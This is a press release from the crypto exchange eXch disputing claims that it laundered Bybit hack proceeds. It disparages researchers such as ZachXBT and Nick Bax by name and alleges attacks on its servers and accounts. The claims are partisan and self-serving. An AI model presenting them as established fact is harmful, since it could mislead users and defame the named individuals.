PRESS RELEASE
eXch official comments on the recent events
- On Decrypt and ethical journalismWe would like to extend our gratitude to Decrypt.co and other media who interviewed us for not only sourcing Twitter posts as credible information but also for seeking insights from sources outside of Twitter, unlike some other media companies. This highlights a concerning trend within the crypto media landscape, where random Twitter posts are often treated as credible sources of information. Good journalism is about high standards of source verification.
- On the Bybit hackThe recent Bybit hack, like previous incidents of this nature, underscores a significant lack of well-trained work force within the cryptocurrency security sector. If a billion-dollar exchange can lose such a substantial amount of money due to a rookie smart contract deployments, it raises serious questions about the overall security practices in the industry.
The Ethereum developer ecosystem has long been one of the worst due its preference for languages like Node.js, which allow for easy intrusion into developer machines through malicious NPM packages. A recent incident involving North Korean Lazarus hackers demonstrates this vulnerability, as they successfully infected hundreds of systems via compromised NPM packages (
https://www.bleepingcomputer.com/news/security/north-korean-lazarus-hackers-infect-hundreds-via-npm-packages/). This is precisely how the machine of the developer of Safe Wallet (who hopefully will consider renaming its brand) was hacked, permitting altering ByBit's smart contracts after. What is even more concerning is the continued negligence among developers who ignore the security threats associated with their chosen languages. Many still mindlessly execute `npm install` on every random repository they download from GitHub, exposing themselves and their projects to significant risks.
Now ByBit desperately offers a total $140M reward to people who helps to recover stolen funds, meanwhile with a such large amount you could afford a few well-trained CISOs outside crypto industry (since inside it it's hard to find somebody competent) making sure you wouldn't lose money this way anymore. Their campaign's website also lists misinformation about eXch on purpose, which proves that ByBit was always hostile to eXch.
- On ZachXBT's tasseographic blockchain analysisGiven Zach's apparent lack of professional education and training in practical information security, it is unsurprising that he and other amateur, anonymous, and pseudonymous researchers, who rely solely on Twitter presence, often make mistakes in their superficial blockchain analyses. Experts from eXch, with professional backgrounds in both blockchain analysis and information security, have conducted their own research into the ByBit exploiter's funds flow, focusing on a specific batch of ~10000 ETH and uncovered the reasons behind the erroneous allegations of eXch's involvement outside its official Ethereum address.
Our investigation revealed a relatively new Bitcoin privacy service that advertises exclusively on Tor-only forums, utilizing Thorchain to process user funds. The transactions from this service closely resemble our rebalance operations through Thorchain, leading to confusion due to the shared parameters, which default to a very old and customized version of ThorSwapKit dropped by its dev to their Discord chat by request of a few users, that we also started to use back in time (this version uses parameters of when this software was in an experimental development stage and is not available anymore). The ByBit exploiter's funds were diverted to a wide variety of bridges, centralized/decentralized exchanges and mixers in an extremely short time frame, and given that some mixers use eXch as one of their backends, this explains how some funds ended in our mixed pool later. Zach's reliance on his favored timing analysis technique, which compares sets of blockchains to identify similar amounts and transactions making it a form of fortune-telling, which is why he and others mistakenly misattributed some ByBit exploiter's transactions to eXch in hopes of gaining financial merit from ByBit, neglecting deeper research, that is typical for this kind of researchers and this is also a reason why we always call them amateurs.
The name-calling and marginal behaviors exhibited by certain "researchers" on Twitter raise significant concerns about their professionalism and competence. It is troubling to observe that even in the event of a mistake regarding eXch, which was confused with another service, they gloat in such a manner. One must wonder how they would react if eXch were genuinely placed in a vulnerable position. Interestingly, when FixedFloat or ByBit experienced losses due to rookie mistakes, they were not subjected to ridicule or called "clowns." However, it is clear that if eXch were to face a similar situation, these individuals would undoubtedly revel in the opportunity to gloat, driven by their apparent animosity towards us.
As Zach has previously stated, "I will make sure to use all my influence to destroy you," a sentiment he has expressed regarding others in the past, we will utilize our knowledge and professionalism to deflect all cheap provocations and false allegations directed at us.
Right to the point, it's absurd how these wannabe-researchers allow the proliferation of eXch's phishing domains while doing absolutely nothing to address the issue. This inaction logically suggests a lack of capability or willingness to effectively manage their responsibilities in the realm of cybersecurity.
- On reception of eXch in the whitehat and establishment communities (and on conspiracy and malicious acts committed against eXch's infrastructure in attempts to claim the Lazarus Bounty reward)
When eXch was established, our objective was to provide a balanced solution that bridged the gap between mixers and government-regulated entities like compliant centralized exchanges (CEX). We anticipated that our approach would be appreciated, as we are neither a mixer nor a CEX that disregards user privacy. However, recent circumstances have proven that many in the whitehat community have acted with hostility towards us.
Despite our previous engagement with them, we have been met with a series of aggressive actions that raise serious concerns about their ethical standards. These include DDoS attacks on our platform, unauthorized penetration testing (SQL injection, XSS, port scanning and service exploitation attempts), and takeover efforts from individuals claiming to be whitehats
*.
1. We have faced server takeover attempts from individuals identifying as whitehats
** who leverage their connections within hosting companies to undermine our operations. A notable incident involved the submission of what appears to be a fraudulent subpoena to OVH or just a friend working there, making OVH to dump the hard disk from one of our frontend servers. This led to OVH shutting down the server, pulling out the disk, and dumping its contents - all within approximately one hour - before switching the server back online, according to what we were able to observe later in the BMC's IPMI SEL logs related to hardware events that they forgot to clear.
This happened on the 2nd day after ByBit announced their bounty reward. If this action was not government-authorized, it constitutes illegal unauthorized access, use, disclosure, disruption, modification, or destruction of our property, which is prosecutable under multiple federal laws, which was a pathetic and a failed attempt to disrupt our service naively thinking our core infrastructure is located there so they can steal coins from us and share ByBit's reward.
2. A few days later, we have received a few emails from Cloudflare with reports of multiple takeover attempts of our Cloudflare account, involving sophisticated social engineering techniques to try to convince Cloudflare to give up them the credentials, which was successfully identified and prevented by Cloudflare, thus many thanks to their security team. Here is one of them:
3. For two weeks and up to this date, we are experiencing a high volume of automated penetration testing attempts directed at our website, making them look to come from popular automation vulnerability testing kits that amateur hackers use. This makes obvious to us it is whitehat circle attempting to disrupt us in spite of getting ByBit's reward.
Given these experiences, we can no longer afford to be "nice" to those who have shown us such blatant disrespect. Our previous efforts to maintain a balanced relationship with the whitehat community have yielded nothing but demotivation and hostility. As a result, we will now act according to our own interests without attempting to appease those who have proven themselves unworthy of our attention and consideration. We had initially believed that the whitehat community would appreciate our commitment to privacy and blockchain security, however, the actions of certain individuals have revealed a darker side, where the line between whitehat and blackhat behavior becomes blurred. These individuals exploit their influence to shield themselves from scrutiny, allowing them to engage in malpractices without fear of accountability.
In light of these developments, we are committed to moving forward with our mission, focusing on our goals and the integrity of our platform. We will continue to uphold our standards of professionalism and ethical conduct, while remaining vigilant against those who seek to undermine our efforts.
* When we refer to "whitehats," you may already be familiar with some of their names, as they have been mentioned multiple times in this thread. However, there are additional names not previously mentioned, such as Nick Bax (aka @bax1337, where "1337" is a self-proclamation of being a "1337h4x0r" - just like many others of these false Messiahs).
** These individuals often refer to themselves as "ethical hackers" and what they actually do to us makes them the completely opposite.- On money laundering allegations and the chinese cryptocurrency exchange mafiaAccording to the aforementioned whitehats, it appears acceptable for major players to launder money, as evidenced by the earlier multiple cases in which OKX, Huobi and ByBit laundered money from hacks. They conveniently ignore such news, yet when non-KYC platforms like eXch process even a small amount of dark funds, they suddenly adopt a dubious moral high ground, starting their witch hunt on platforms like ours.
https://hacked.slowmist.io (<--- a free advertisement to the one-man company who hates eXch most) lists a lot of events in the past where the hacked funds can be traced in amount of millions to many large CEX, but their addresses were never given "community notes" by Etherscan. On the other hand, Etherscan given to make the part of their mafia, of course aims to attack our reputation by putting cheap "community notes" targeting our address but never targeting addresses of those who feed them even when these addresses process even a lot more shady funds that can't be even comparable to us.
- On community and some major players supportWe extend our gratitude to those who have supported eXch throughout this challenging period, including Binance and Coinbase, who have remained steadfast in their commitment to our service despite the ongoing defamation campaign against us.
- On what's nextWith all these events we will have to take a lot of countermeasures to make sure our operations are not affected as well as to protect our company. There will be some significant changes in regards on how our service operates which obviously won't affect our partners and users, but will provide us with some extra protection. Some of them were already mentioned in some posts here, but some of them not and will be announced in the next posts.
